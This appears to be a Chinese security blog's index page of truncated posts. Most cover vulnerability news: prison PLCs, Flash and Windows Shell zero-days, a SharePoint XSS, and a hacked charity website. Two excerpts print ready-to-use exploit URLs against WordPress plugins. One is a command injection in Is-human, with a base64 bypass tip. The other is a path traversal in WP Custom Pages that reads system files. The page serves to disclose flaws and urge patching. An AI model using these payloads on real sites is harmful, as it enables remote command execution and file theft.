Pray's Blog

《连线》报导，研究人员发现，控制监狱牢门的PLC（可编程控制器）中的安全漏洞可让黑客释放出囚犯。破坏伊朗核电站离心机的Stuxnet蠕虫是利用了工业控制系统中PLC的漏洞，而控制牢门的PLC存在类似的漏洞。安全顾问和工程师John Strauchs将在本周举行的DefCon 黑客会议上讨论和演示他的发现。 Strauchs称，监狱使用PLC控制牢门和其它设施上的锁和门。他指出，许多人并不知道监狱是如何设计的，因此这个问 题以前很少有人关注，他们不知道监狱使用了与离心机相同的PLC。PLC并不连...阅读更多

Is-human是WordPress的一个发表评论验证插件。 这个插件的漏洞能导致远程命令执行。 以下是BUG原理，各位博友赶快修复。 EXP： server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error 其中，passthru(whoami)这里可以执行任意命令，比如ls，uname等。但uname -a， wget等无法执行，含有空格。需要base64编码。 EXP： server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();e...阅读更多

据外国媒体报导，近日在网络上出现一种让iOS用户闻之色变的病毒。据了解，此种病毒隐藏在一些广告的链接里，只要不小心点击到其中的链接，用户iOS 设备上的信息将全部被删除。近来一直在网上搜索关于越狱，解锁方法的iOS用户们不知道，他们心爱的设备随时处于危险之中。 据悉，用户在iOS设备上进行相关的搜索工作时，网页上会出现一些假的信息说明，比如“点击以解锁你的设备”，点击之后就会出现一组“等待10到15秒”的动画，并且跟着 “免费下载解锁工具”的字样。然后？用户会悲剧的发...阅读更多

Worepress的一个自定义页面的插件存在远程包含漏洞。 插件名称：WP Custom Pages 版本：0.5.0.1 漏洞如下： http://域名/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini 而wordpress的插件少用一份多一份安全。有安装这个版本的请赶快升级新版本。 文章地址:http://blog.nodll.com/2011/04/13/wp-custom-pages-bug/Pray.html 阅读更多

　　4月12日，瑞星互联网攻防实验室向网民发出安全警报，网民常用的Flash Player存在一个严重的0day漏洞（漏洞编号：CVE-2011-0611）。该漏洞可以被利用在Word中嵌入带毒Flash，用户一旦打开，便会“中毒”，从而造成电脑隐私文件外泄、中毒崩溃甚至被他人控制等严重后果。目前，瑞星杀毒软件的“主动防御功能”，已经实现对于此类攻击的全面拦截，用户可以下载永久免费的瑞星杀毒软件进行防护。 　　瑞星安全专家介绍说，Flash被广泛应用于互联网的各个方面，比如开心农场、优酷、QQ游...阅读更多

Nmap是一个著名的开源工具，它出现在20世纪90后期。 2003年，在电影《黑客帝国2》中Tritnity曾用Nmap 2.54BETA25版攻击SSH 服务器， 破坏发电厂的安全，Nmap因此受到了普遍关注。 在现实生活中，Nmap主要用于确定网络上的主机，主机提供的服务，以及扫描网络的开放端口等等。 Nmap是安全专家用以映射他们的网络和测试安全漏洞的有价值的工具，有人担心黑客帝国中的情况的出现，因为Nmap也是恶意黑客的利用的工具，被用来查找可以攻击的开放端口。 Nmap（Network Mapper，网络映射器...阅读更多

日前微软发布安全通告，称其正在调查一个几乎涉及全系Windows操作系统的远程代码执行漏洞（CVE编号：CVE-2010- 2568）。该漏洞存在于“Windows Shell”组件中，当受影响系统用户点击或者Windows Shell试图加载经过精心构造的恶意快捷方式图标时，由于Windows Shell没有验证指定的参数，可导致恶意代码在本地运行。 反病毒专家介绍，微软公布了两个临时解决方案，暂未推出正式补丁。电脑用户可采用微软临时解决方法，避免系统遭到利用该漏洞的恶意代码攻击。 临时解决方案一：通过修改...阅读更多

微软安全应急小组确认了微软SharePoint Server 2007产品中的严重跨站脚本漏洞(XSS)的存在。 该漏洞可以通过浏览器被利用，使黑客通过漏洞程序执行任意的JavaScript代码。该漏洞的具体细节已经被公布，微软预计在本周末发布的安全报告上将 提供补丁修复这一漏洞。 下面是关于这个漏洞的一些细节： 该漏洞是没有正确的处理“/_layouts/help.aspx”脚本，来清除用户输入的“cid0”变量。成功利用该漏洞的攻击将导致应用程序挂起，基于Cookies的信息将可能泄露，用户敏感数据将可能遭到篡改...阅读更多

BUG影响版本: WordPress NextGEN Gallery 1.5.1 WordPress NextGEN Gallery 1.5.0漏洞描述: BUGTRAQ  ID: 39250 CVE ID: CVE-2010-1186 WordPress是一款免费的论坛Blog系统。 WordPress所使用的NextGEN Gallery图形库插件没有正确地转义提交给media-rss.php脚本的mode参数： 1 2 3 /----- $mode = $_GET["mode"]; - -----/ 如果没有选择正确的mode，该参数就被返回给用户： 1 2 3 4 5 6 7 /----- } else {     header('content-type:text/plain;charset=utf-8'); ...阅读更多

中新网4月11日电 360安全中心近日发现，正通过“春雨计划”救助西南大旱灾民的中国红十字基金会官方网站的服务器不但被黑客入侵并种下“后门”程序，如今更成了一个高风险的木马站点。截止4月11日中午发稿前，360工作人员已经给国家互联网应急中心(CNCERT)发送事件报告，同时紧急通知了该基金会，并将努力协助该机构修复漏洞。  　　“黑客利用了中国红十字基金会官网上的某些安全漏洞，攻陷网站服务器并掌握了后台的所有权限，可以为所欲为。红十字基金会网站这样的公益机构经常会与各...阅读更多